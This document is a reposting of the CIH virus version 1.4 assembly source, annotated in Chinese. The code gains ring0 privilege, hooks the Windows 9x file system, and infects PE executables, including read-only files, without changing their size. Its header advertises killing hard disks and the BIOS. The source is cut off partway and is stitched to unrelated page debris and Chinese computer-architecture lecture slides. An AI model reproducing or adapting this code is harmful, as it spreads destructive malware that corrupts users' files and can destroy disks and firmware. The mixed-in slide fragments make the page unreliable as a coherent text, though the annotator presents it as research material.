;日期:2002/5/10 文章出处:UnKnow ;标题:CIH病毒1.4版本之中文注释作者:邹丹;CIH病毒1.4版本之中文注释由"邹丹"编写完成于1999-4-09;源程序中的英文注释未作修改,全部保留;电子邮件: zd_dan@;个人主页: ;本人所编写之注释仅供研究之用,如作其他用途,概于本人无关!!!;!!!!!!后附精彩后记,敬请留意!!!!!!; **************************************************************************** ; * The Virus Program Information *; **************************************************************************** ; * *; * Designer : CIH Source : TTIT of TATUNG in Taiwan *; * Create Date : 04/26/1998 Now Version : 1.4 *; * Modification Time : 05/31/1998 *; * *; * Turbo Assembler Version 4.0 : tasm /m cih *; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * ;编译连接方法; * * ;使用的是TurboAssembler; *==========================================================================* ;可在Borland C++ 3.1中找到; * Modification History *; *==========================================================================* ; * v1.0 1. Create the Virus Program. *; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *; * 04/26/1998 3. Virus Code doesn't Reload into System. *; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *; * 6. When System Opens Existing PE File, the File will be *; * Infected, and the File doesn't be Reinfected. *; * 7. It is also Infected, even the File is Read-Only. *; * 8. When the File is Infected, the Modification Date and Time *; * of the File also don't be Changed. *; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *; * Previous FileSystemApiHook, it will Call the Function *; * that the IFS Manager Would Normally Call to Implement *; * this Particular I/O Request. *; * 10. The Virus Size is only 656 Bytes. *; *==========================================================================* ; * v1.1 1. Especially, the File that be Infected will not Increase *; * it's Size... ^__^ *; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *; * When Exception Error Occurs, Our OS System should be in *; * Windows NT. So My Cute Virus will not Continue to Run, *; * it will Jmup to Original Application to Run. *; * 3. Use Better Algorithm, Reduce Virus Code Size. *; * 4. The Virus "Basic" Size is only 796 Bytes. *; *==========================================================================* ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *; * 2. Modify the Bug of v1.1 *; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *; *==========================================================================* ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *; * So When Open WinZip Self-Extractor ==> Don't Infect it. *; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *; *==========================================================================* ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *; * 2. Change the Date of Killing Computers. *; * 05/31/1998 3. Modify Virus Version Copyright. *; * 4. The Virus "Basic" Size is 1019 Bytes. *; **************************************************************************** ;.586P ;586保护模式汇编; **************************************************************************** ; * Original PE Executable File(Don't Modify this Section) *; **************************************************************************** OriginalAppEXE SEGMENTFileHeader: ;编译连接后的PE格式可执行文件文件头db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000hdb 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000hdb 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000hdb 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdhdb 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068hdb 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072hdb 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fhdb 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06ehdb 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020hdb 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ahdb 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdd 00000000h, VirusSizeOriginalAppEXE ENDS; **************************************************************************** ; * My Virus Game *; ****************************************************************************; *********************************************************; * Constant Define *; *********************************************************TRUE = 1FALSE = 0DEBUG = TRUEMajorVirusVersion = 1 ;主版本号MinorVirusVersion = 4 ;副版本号VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ;合成版本号IF DEBUG ;是否是调试用FirstKillHardDiskNumber = 81h ;杀掉第二个硬盘“d:”HookExceptionNumber = 05h ;使用5号中断ELSEFirstKillHardDiskNumber = 80h ;杀掉第一个硬盘“c:”HookExceptionNumber = 03h ;使用3号中断ENDIFFileNameBufferSize = 7fh; *********************************************************; *********************************************************VirusGame SEGMENTASSUME CS:VirusGame, DS:VirusGame, SS:VirusGameASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame; *********************************************************; * Ring3 Virus Game Initial Program *; *********************************************************MyVirusStart:push ebp; *************************************; * Let's Modify Structured Exception *; * Handing, Prevent Exception Error *; * Occurrence, Especially in NT. *; *************************************lea eax, [esp-04h*2]xor ebx, ebxxchg eax, fs:[ebx]call @0@0:pop ebx ;获取程序起始偏移量?;用此偏移量+相对偏移量获得绝对地址(病毒程序大量用到)lea ecx, StopToRunVirusCode-@0[ebx]push ecxpush eax; *************************************; * Let's Modify *; * IDT(Interrupt Descri&#112;tor Table) *; * to Get Ring0 Privilege... *; *************************************push eax ;sidt [esp-02h] ; Get IDT Base Address ?;获得中断描述符表的基址到ebx pop ebx ;add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ;计算要用中断的基址到ebxcli ;在改表项前关中断?mov ebp, [ebx] ; Get Exception Basemov bp, [ebx-04h] ; Entry Point ?;取得中断基址到ebplea esi, MyExceptionHook-@1[ecx]push esi ?;esi为病毒中断例程地址mov [ebx-04h], si ;shr esi, 16 ; Modify Exceptionmov [ebx+02h], si ; Entry Point Address;修改中断基址使指向病毒中断例程pop esi; *************************************; * Generate Exception to Get Ring0 *; *************************************int HookExceptionNumber ; GenerateException;以中断的方式进入0级ReturnAddressOfEndException = $; *************************************; * Merge All Virus Code Section *; *************************************push esimov esi, eax ;esi指向病毒开始处LoopOfMergeAllVirusCodeSection:mov ecx, [eax-04h]rep movsb ;拷贝病毒代码到分配好的系统内存首址sub eax, 08hmov esi, [eax]or esi, esijz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ;拷贝结束jmp LoopOfMergeAllVirusCodeSection ;拷贝下一段QuitLoopOfMergeAllVirusCodeSection:pop esi; *************************************; * Generate Exception Again *; *************************************int HookExceptionNumber ; GenerateException Aga ;再一次进入0级; *************************************; * Let's Restore *; * Structured Exception Handing *; *************************************ReadyRestoreSE:sti ;开中断xor ebx, ebxjmp RestoreSE; *************************************; * When Exception Error Occurs, *; * Our OS System should be in NT. *; * So My Cute Virus will not *; * Continue to Run, it Jmups to *; * Original Application to Run. *; *************************************StopToRunVirusCode:@1 = StopToRunVirusCodexor ebx, ebxmov eax, fs:[ebx]mov esp, [eax]RestoreSE:pop dword ptr fs:[ebx]pop eax; *************************************; * Return Original App to Execute *; *************************************pop ebppush 00401000h ; Push OriginalOriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack;把原程序的开始地址压栈ret ; Return to Original App Entry Point ;以子程序返回形式返回到原程序的开始处; *********************************************************; * Ring0 Virus Game Initial Program *; *********************************************************MyExceptionHook:@2 = MyExceptionHookjz InstallMyFileSystemApiHook ;如果病毒代码已拷贝好了;转到安装文件系统钩子的程序; *************************************; * Do My Virus Exist in System !? *; *************************************mov ecx, dr0 ;察看dr0是否设置过(dr0为病毒驻留标志)jecxz AllocateSystemMemoryPage ;没有设置,则分配系统内存add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException; *************************************; * Return to Ring3 Initial Program *; *************************************ExitRing0Init:mov [ebx-04h], bp ;shr ebp, 16 ; Restore Exceptionmov [ebx+02h], bp ; ;恢复原来的中断基址iretd ;中断返回; *************************************; * Allocate SystemMemory Page to Use *; *************************************AllocateSystemMemoryPage:mov dr0, ebx ; Set the Mark of My Virus Exist in System;设置dr0,它是病毒驻留的标志push 00000000fh ;push ecx ;push 0ffffffffh ;push ecx ;调用方法ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, ;ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr,;ULONG flags);push ecx ;push ecx ;push 000000001h ;push 000000002h ;int 20h ; VMMCALL _PageAllocate;VXD调用_PageAllocate = $ ;dd 00010053h ; Use EAX, ECX, EDX, and flagsadd esp, 08h*04h ;恢复栈指针xchg edi, eax ; EDI = SystemMemory Start Address; EDI指向分配好的系统内存首址lea eax, MyVirusStart-@2[esi] ;eax指向病毒开始处iretd ; Return to Ring3 Initial Program ;退出中断,回3级(回到"Merge All Virus Code Section"); *************************************; * Install My File System Api Hook *; *************************************InstallMyFileSystemApiHook:lea eax, FileSystemApiHook-@6[edi] ;指向文件系统钩子程序首址push eax ;int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHookIFSMgr_InstallFileSystemApiHook = $ ;dd 00400067h ; Use EAX, ECX, EDX, and flags;在调用后变为call [IFSMgr_InstallFileSystemApiHook]mov dr0, eax ; Save OldFileSystemApiHook Address;保存原来的文件系统钩子程序首址到dr0(改调用的返回值是前一个链值)pop eax ; EAX = FileSystemApiHook Address; Save Old IFSMgr_InstallFileSystemApiHook Entry Pointmov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]mov edx, [ecx] ;edx为IFSMgr_InstallFileSystemApiHook功能的地址mov OldInstallFileSystemApiHook-@3[eax], edx ?;保存; Modify IFSMgr_InstallFileSystemApiHook Entry Pointlea eax, InstallFileSystemApiHook-@3[eax]mov [ecx], eax ?;设置新的IFSMgr_InstallFileSystemApiHook功能调用的地址;使指向InstallFileSystemApiHookclijmp ExitRing0Init ?;退出0级(int 3 or int 5); *********************************************************; * Code Size of Merge Virus Code Section *; ********************************************************* CodeSizeOfMergeVirusCodeSection = offset $; *********************************************************; * IFSMgr_InstallFileSystemApiHook *; *********************************************************InstallFileSystemApiHook: ;新的IFSMgr_InstallFileSystemApiHook功能调用push ebxcall @4 ;@4: ;pop ebx ; mov ebx, offset FileSystemApiHook ;获得当前指令的偏移地址add ebx, FileSystemApiHook-@4 ;加上偏移的差=FileSystemApiHook的偏移push ebxint 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook ;调用VXD移去指向FileSystemApiHook的钩子IFSMgr_RemoveFileSystemApiHook = $dd 00400068h ; Use EAX, ECX, EDX, and flags ;调用号pop eax; Call Original IFSMgr_InstallFileSystemApiHook; to Link Client FileSystemApiHookpush dword ptr [esp+8]call OldInstallFileSystemApiHook-@3[ebx] ;调用原来的IFSMgr_InstallFileSystemApiHook功能设置钩子pop ecxpush eax; Call Original IFSMgr_InstallFileSystemApiHook; to Link My FileSystemApiHookpush ebxcall OldInstallFileSystemApiHook-@3[ebx] ;调用原来的IFSMgr_InstallFileSystemApiHook功能设置钩子pop ecxmov dr0, eax ; Adjust OldFileSystemApiHook Address ;调整原来的地址pop eaxpop ebxret; *********************************************************; * Static Data *; ********************************************************* OldInstallFileSystemApiHook dd ? ;原来的InstallFileSystemApiHook调用的地址; *********************************************************; * IFSMgr_FileSystemHook *; *********************************************************; *************************************; * IFSMgr_FileSystemHook Entry Point *; *************************************FileSystemApiHook: ;安装好的文件系统钩子@3 = FileSystemApiHookpushad ;保存寄存器(20h长)call @5 ;@5: ;pop esi ; mov esi, offset ;esi为当前指令的偏移add esi, VirusGameDataStartAddress-@5;esi为FileSystemApiHook的偏移加上到VirusGameDataStartAddress的偏移之差=VirusGameDataStartAddress的偏移; *************************************; * Is OnBusy !? *; *************************************test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) ;测试"忙"标志jnz pIFSFunc ; goto pIFSFunc ;"忙"则转到pIFSFunc; *************************************; * Is OpenFile !? *; *************************************; if ( NotOpenFile ); goto prevhooklea ebx, [esp+20h+04h+04h] ;ebx为FunctionNum的地址;文件系统钩子的调用格式如下;FileSystemApiHookFunction(pIFSFunc FSDFnAddr, int FunctionNum, int Drive,int ResourceFlags, int CodePage, pioreq pir);助标2cmp dword ptr [ebx], 00000024h ;测试此次调用是否是为了打开文件;在DDK的ifs.h中定义的#define IFSFN_OPEN 36jne prevhook ;不是就跳到前一个文件钩子去; *************************************; * Enable OnBusy *; *************************************inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ;设置"忙"标志为"忙"; *************************************; * Get FilePath's DriveNumber, *; * then Set the DriveName to *; * FileNameBuffer. *; *************************************; * Ex. If DriveNumber is 03h, *; * DriveName is 'C:'. *; *************************************; mov esi, offset FileNameBufferadd esi, FileNameBuffer-@6 ;esi指向FileNameBufferpush esi ;保存之mov al, [ebx+04h] ;ebx+4为int Drive的地址cmp al, 0ffh ;是否是UNC(universal naming conventions)地址je CallUniToBCSPath ;是就转add al, 40hmov ah, ':'mov [esi], eax ;处理成"X:"的形式inc esiinc esi; *************************************; * UniToBCSPath *; *************************************; * This Service Converts *; * a Canonicalized Unicode Pathname * ;把Canonicalized Unicode的字符转换为普通的BCS字符集; * to a Normal Pathname in the *; * Specified BCS Character Set. *; *************************************;调用方法 UniToBCSPath(unsigned char * pBCSPath, ParsedPath * pUniPath, unsigned int maxLength, int charSet)CallUniToBCSPath:push 00000000h ;字符集push FileNameBufferSize ;字符长度mov ebx, [ebx+10h]mov eax, [ebx+0ch]add eax, 04hpush eax ;Uni字符首址push esi ;BCS字符首址int 20h ; VXDCall UniToBCSPath ;调用UniToBCSPathUniToBCSPath = $dd 00400041h ;调用idadd esp, 04h*04h; *************************************; * Is FileName '.EXE' !? *; *************************************; cmp [esi+eax-04h], '.EXE'cmp [esi+eax-04h], 'EXE.' ;测试是否是*.EXE(可执行)文件pop esijne DisableOnBusyIF DEBUG; *************************************; * Only for Debug *; *************************************; cmp [esi+eax-06h], 'FUCK'cmp [esi+eax-06h], 'KCUF' ;如果是测试用途则测试是否是"FUCK.EXE"jne DisableOnBusyENDIF; *************************************; * Is Open Existing File !? *; *************************************; if ( NotOpenExistingFile ); goto DisableOnBusycmp word ptr [ebx+18h], 01h ;测试是否打开jne DisableOnBusy; *************************************; * Get Attributes of the File *; *************************************mov ax, 4300h ;IFSMgr_Ring0_FileIO的获得文件属性号(R0_FILEATTRIBUTES/GET_ATTRIBUTES)int 20h ; VXDCall IFSMgr_Ring0_FileIO ;调用IFSMgr_Ring0_FileIO的获得文件属性的功能IFSMgr_Ring0_FileIO = $dd 00400032h ;调用号jc DisableOnBusy ;失败否?push ecx; *************************************; * Get IFSMgr_Ring0_FileIO Address *; *************************************mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]mov edi, [edi] ;获得IFSMgr_Ring0_FileIO调用的地址; *************************************; * Is Read-Only File !? *; *************************************test cl, 01hjz OpenFile ;测试是否是只读文件; *************************************; * Modify Read-Only File to Write *; *************************************mov ax, 4301h ;IFSMgr_Ring0_FileIO的获得文件属性号(R0_FILEATTRIBUTES/SET_ATTRIBUTES )xor ecx, ecxcall edi ; VXDCall IFSMgr_Ring0_FileIO ;调用IFSMgr_Ring0_FileIO的改文件属性功能,使文件可写; *************************************; * Open File *; *************************************OpenFile:xor eax, eaxmov ah, 0d5h ;IFSMgr_Ring0_FileIO的打开文件功能号(R0_OPENCREATFILE or RO_OPENCREAT_IN_CONTEXT)xor ecx, ecx ;文件属性xor edx, edxinc edxmov ebx, edxinc ebx ;esi为文件名首址call edi ; VXDCall IFSMgr_Ring0_FileIO ;调用IFSMgr_Ring0_FileIO的打开文件功能xchg ebx, eax ; mov ebx, FileHandle ;在ebx中保存文件句柄; *************************************; * Need to Restore *; * Attributes of the File !? *; *************************************pop ecxpushftest cl, 01hjz IsOpenFileOK ;是否需要恢复文件属性(有写属性就不需要恢复了); *************************************; * Restore Attributes of the File *; *************************************mov ax, 4301h ;IFSMgr_Ring0_FileIO的获得文件属性号(R0_FILEATTRIBUTES/SET_ATTRIBUTES)call edi ; VXDCall IFSMgr_Ring0_FileIO ;恢复文件属性; *************************************; * Is Open File OK !? *; *************************************IsOpenFileOK:popfjc DisableOnBusy ;打开是否成功?; *************************************; * Open File Already Succeed. ^__^ *; *************************************push esi ; Push FileNameBuffer Address to Stack ;把文件名数据区首址压栈pushf ; Now CF = 0, Push Flag to Stack ;保存标志位add esi, DataBuffer-@7 ; mov esi, offset DataBuffer ;esi指向数据区首址; ***************************; * Get OffsetToNewHeader *; ***************************xor eax, eaxmov ah, 0d6h ;IFSMgr_Ring0_FileIO的读文件功能号(R0_READFILE); For Doing Minimal VirusCode's Length,; I Save EAX to EBP.mov ebp, eaxpush 00000004h ;读取4个字节pop ecxpush 0000003ch ;读取dos文件头偏移3ch处的Windows文件头首部偏移pop edxcall edi ; VXDCall IFSMgr_Ring0_FileIO ;读文件到esimov edx, [esi] ;Windows文件头首部偏移放到edx; ***************************; * Get 'PE\0' Signature *; * of ImageFileHeader, and *; * Infected Mark. *; ***************************dec edxmov eax, ebp ;功能号call edi ; VXDCall IFSMgr_Ring0_FileIO ;读文件到esi; ***************************; * Is PE !? *; ***************************; * Is the File *; * Already Infected !? *; ***************************; * WinZip Self-Extractor *; * doesn't Have Infected *; * Mark Because My Virus *; * doesn't Infect it. *; ***************************; cmp [esi], '\0PE\0'cmp dword ptr [esi], 00455000h ;判断是否是PE文件(标志"PE\0\0") jne CloseFile ;不是就关闭文件; *************************************; * The File is ^o^ *; * PE(Portable Executable) indeed. *; *************************************; * The File isn't also Infected. *; *************************************; *************************************; * Start to Infect the File *; *************************************; * Registers Use Status Now : *; * *; * EAX = 04h *; * EBX = File Handle *; * ECX = 04h *; * EDX = 'PE\0\0' Signature of *; * ImageFileHeader Pointer's *; * Former Byte. *; * ESI = DataBuffer Address ==> @8 *; * EDI = IFSMgr_Ring0_FileIO Address *; * EBP = D600h ==> Read Data in File *; *************************************; * Stack Dump : *; * *; * ESP => ------------------------- *; * | EFLAG(CF=0) | *; * ------------------------- *; * | FileNameBufferPointer | *; * ------------------------- *; * | EDI | *; * ------------------------- *; * | ESI | *; * ------------------------- *; * | EBP | *; * ------------------------- *; * | ESP | *; * ------------------------- *; * | EBX | *; * ------------------------- *; * | EDX | *; * ------------------------- *; * | ECX | *; * ------------------------- *; * | EAX | *; * ------------------------- *; * | Return Address | *; * ------------------------- *; *************************************push ebx ; Save File Handle ;保存文件句柄push 00h ; Set VirusCodeSectionTableEndMark; ***************************; * Let's Set the *; * Virus' Infected Mark *; ***************************push 01h ; Sizepush edx ; Pointer of File ;edx指向PE文件头偏移00hpush edi ; Address of Buffer ;edi为IFSMgr_Ring0_FileIO的地址(原注释有误); ***************************; * Save ESP Register *; ***************************mov dr1, esp; ***************************; * Let's Set the *; * NewAddressOfEntryPoint *; * ( Only First Set Size ) *; ***************************push eax ; Size; ***************************; * Let's Read *; * Image Header in File *; ***************************mov eax, ebpmov cl, SizeOfImageHeaderToRead ;要读2个字节(WORD NumberOfSections)add edx, 07h ; Move EDX to NumberOfSections ;PE文件头+07h为NumberOfSections(块个数)call edi ; VXDCall IFSMgr_Ring0_FileIO ;读出NumberOfSections(块个数)到esi; ***************************; * Let's Set the *; * NewAddressOfEntryPoint *; * ( Set Pointer of File, *; * Address of Buffer ) *; ***************************lea eax, (AddressOfEntryPoint-@8)[edx]push eax ; Pointer of Filelea eax, (NewAddressOfEntryPoint-@8)[esi]push eax ; Address of Buffer; ***************************; * Move EDX to the Start *; * of SectionTable in File *; ***************************movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]lea edx, [eax+edx+12h] ;edx为SectionTable的偏移; ***************************; * Let's Get *; * Total Size of Sections *; ***************************mov al, SizeOfScetionTable ;每个块表项(ScetionTable)的大小(字节); I Assume NumberOfSections <= 0ffhmov cl, (NumberOfSections-@8)[esi]mul cl ;每个块表项乘以块个数=块表大小; ***************************; * Let's Set Section Table *; ***************************; Move ESI to the Start of SectionTablelea esi, (StartOfSectionTable-@8)[esi] ;esi指向块表首址(在病毒动态数据区中)push eax ; Size ;块表大小push edx ; Pointer of File ;edx为SectionTable的偏移push esi ; Address of Buffer ;; ***************************; * The Code Size of Merge *; * Virus Code Section and *; * Total Size of Virus *; * Code Section Table Must *; * be Small or Equal the *; * Unused Space Size of *; * Following Section Table *; ***************************inc ecxpush ecx ; Save NumberOfSections+1shl ecx, 03h ;*8push ecx ; Save TotalSizeOfVirusCodeSectionTable ;预留病毒块表空间add ecx, eaxadd ecx, edx ;ecx+文件的正文的偏移sub ecx, (SizeOfHeaders-@9)[esi]not ecxinc ecx ;求补;ecx为文件头大小-正文的偏移=未用空间; Save My Virus First Section Code; Size of Following Section Table...; ( Not Include the Size of Virus Code Section Table )push ecxxchg ecx, eax ; ECX = Size of Section Table ;ecx为块表大小; Save Original Address of Entry Pointmov eax, (AddressOfEntryPoint-@9)[esi] ;入口RVA地址add eax, (ImageBase-@9)[esi] ;装入基址mov (OriginalAddressOfEntryPoint-@9)[esi], eax ;保存装入后实际的入口地址cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection ;未用空间和病毒第一块大小比较jl OnlySetInfectedMark ;小于就只设感染标志; ***************************; * Read All Section Tables *; ***************************mov eax, ebp ;读的功能号call edi ; VXDCall IFSMgr_Ring0_FileIO ;读块表到esi(@9处); ***************************; * Full Modify the Bug : *; * WinZip Self-Extractor *; * Occurs Error... *; ***************************; * So When User Opens *; * WinZip Self-Extractor, *; * Virus Doesn't Infect it.*; ***************************; * First, Virus Gets the *; * PointerToRawData in the *; * Second Section Table, *; * Reads the Section Data, *; * and Tests the String of *; * 'WinZip(R)'...... *; ***************************xchg eax, ebppush 00000004hpop ecx ;读4字节push edxmov edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx] ;edx为第二块的偏移(.rdata) add edx, 12h ;加10h+2h(10h处为"WinZip....")call edi ; VXDCall IFSMgr_Ring0_FileIO ;读4字节到esi; cmp [esi], 'nZip'cmp dword ptr [esi], 'piZn' ;判断是否是WinZip自解压文件je NotSetInfectedMark ;是就不设置感染标志pop edx ;edx指向块表在文件中首址; ***************************; * Let's Set Total Virus *; * Code Section Table *; ***************************; EBX = My Virus First Section Code; Size of Following Section Tablepop ebx ; 未用空间大小pop edi ; EDI = TotalSizeOfVirusCodeSectionTablpop ecx ; ECX = NumberOfSections+1push edi ; Sizeadd edx, ebp ; ebp为块表大小push edx ; Pointer of File ;指向块表后(第一块)add ebp, esi ; ebp指向病毒数据区的块表后(第一块)push ebp ; Address of Buffer。

相关主题
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
P15. 11 (前半个问题)
Thanks
• 语言程序
• 目的程序 • 汇编程序 • 高级语言源程序
目的程序
• 早期计算机中,人们直接用机器语言编写程序,这种编 写程序的方式称为手编程序。 • 特点: 计算机完全可以“识别”并能执行,所以又叫 做目的程序。 • 缺点:用机器语言编写程序很繁琐, 费时费事,易出错, 出错后寻找错误也相当费事,这就大大限制了计算机的 使用。
#include“com.h" int main(void) { fd = open(“/dev/com”,O_RW); ... ioctl(fd,COM_INIT,Data); ioctl(fd,COM_SEND,500); ... close(fd); }
gpio_init(void);
...
} com_fops = { ioctl: com_ioctl, open: com_open, release: com_release, }; int __init com_init(void) { register_chrdev(...); } int com_ioctl (..., ...) { int com_ioctl (..., ...){ ... *Regdata = bps; } ... com_send(int data) } int com_send(int data) { ... }
1. 2. 3. 4. 5. 微程序级 一般机器级 操作系统级 汇编语言级 高级语言级

ห้องสมุดไป่ตู้
路虽远,不行不至; 事虽难,不为不成。
作业 注明:姓名 学号 丏业
• 了解计算机的发展概述 冯.诺依曼(Von Neumann)思想
P15. 4 (+ 及其各个部件功能)
影响计算机性能的因素有哪些? 计算机层次结构
LED
Seirial
• 系统程序包括以下四类:
各种服务性程序 语言程序(如汇编程序编译程序解释程序等) 操作系统(DOS、Windows、Linux、„);
数据库管理系统
• 应用程序:用户利用计算机来解决某些特定 问题所编制的程序
1.4.2 软件的发展演变
• 以系统程序为例,简要说明软件的发展演变过程
1.5 计算机系统的层次结构
• 多级组成的计算机系统
• 软件与硬件的逻辑等价性
多级组成的计算机系统
1.微程序设计级
2. 一般机器级 3. 操作系统级
这是一个实在的硬件级,他由机器硬件直接执行微命令。 也称为机器语言级,由微程序解释机器指令系统。这一级也是硬件 级。 由操作系统程序实现。 这些操作系统由机器指令和广义指令组成,所以这一级也称为混合 级。 广义指令:操作系统定义和解释的软件指令。 一种符号形式语言。这一级由汇编程序支持和执行。
• 随着计算机在信息处理、情报检索及各种管理系统中 应用的发展,要求大量处理某些数据,建立和检索大量 的表格。这些数据和表格按一定的规律组织起来,使得 处理更方便,检索更迅速,用户使用更方便,于是出现了 数据库。
• 数据库是:实现有组织地、动态地存储大量相关 数据,方便多用户访问的计算机软、硬件资源组成 的系统。 • 数据库和数据库管理软件一起,组成了数据库管理 系统。
4. 汇编语言级 5. 高级语言级
面向用户,为方便用户编写应用程序而设置的。 这一级由各种高级语言编译程序支持和执行。
计算机系统
层次结构
示意图
小结
• “电子计算机”是指现在广泛应用的电子数字计 算机,
• 它分为专用计算机和通用计算机两大类。 • 专用和通用是根据计算机的效率、速度、价格、运行 的经济性和适应性来划分的。
1.
2. 3.
4.
5.
不需要main.c程序源 代码 接口一致,要了解设 备的使用方式 加入新的设备不影响 其他程序(QQ,MSN) 多个程序可以并行运 行 要重新制作文件系统
mem.c {...
#include"gpio.h"
int main(void) { fd = open(“/dev/gpio”,O_RDONLY); ... ioctl(fd,GPIO_CLR_PIN,1); ... close(fd); }
操作系统
• 操作系统作是软件吗?
• 操作系统是什么软件? • 操作系统和其他软件有什么区别?
1.4 计算机的软件
1.4.1 软件的组成和分类
• 凡是用于一台计算机的各种程序,统称为这台
计算机的程序或软件系统
• 计算机软件一般分为两大类:一类叫系统程
序,一类叫应用程序
• 系统程序:
(1)简化程序设计,简化使用方法(API) (2)提高计算机的使用效率 (3)发挥和扩大计算机的功能(比如安全性)
• 操作系统是随着硬件和软件不断发展而逐渐形成的一套软 件系统,用来管理计算机资源和自动调度用户的作业程序, 而使多个用户能有效地共用一套计算机系统。 • 操作系统目前大致分为(根据不同使用环境要求,)
• • • • 批处理操作系统 分时操作系统 网络操作系统 实时操作系统等多种。
数据库管理系统
• 数据库产生的由来
gpio_fops = { ioctl: gpio_ioctl, open: gpio_open, release: gpio_release, }; int __init gpio_init(void) { register_chrdev(...); } int gpio_ioctl (..., ...) { ... }
汇编程序
